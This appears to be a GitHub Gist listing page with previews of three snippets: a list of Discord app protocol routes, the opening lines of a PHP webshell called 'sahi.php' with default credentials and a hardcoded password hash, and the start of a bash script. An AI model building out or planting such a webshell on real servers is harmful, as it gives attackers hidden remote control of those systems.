Skip to content

Instantly share code, notes, and snippets.

Nihad kardespro

View GitHub Profile
@ghostrider-05
ghostrider-05 / discord_app_protocols.md
Last active December 4, 2025 22:51
An unofficial list of discord app protocol routes

Discord app protocol routes

Home:

  • /: discord://-/
  • friends: discord://-/channels/@me/
  • nitro: discord://-/store
  • shop: discord://-/shop
  • message requests: discord://-/message-requests
  • family centre: discord://-/family-center
@zsahi
zsahi / sahi.php
Last active December 8, 2025 13:07
sahi.php is php webshell, which is all in one web server penetration testing and exploitation tool. Credentials are admin:sahi
<?php
$u = "admin";
$p = "61134b3a07ea8bee089d0ae8e60ad552"; //sahi
header("Pragma: no-cache");
header("Cache-Control: no-store");
error_reporting(0);
session_start();
if (@get_magic_quotes_gpc()) {
function stripslashes_deep($value){
#!/bin/bash
set -e
if [ $# -ne 2 ]; then
echo "usage: $0 <base_uri> <target_dir_path>"
exit 1;
fi
BASE_URI=$1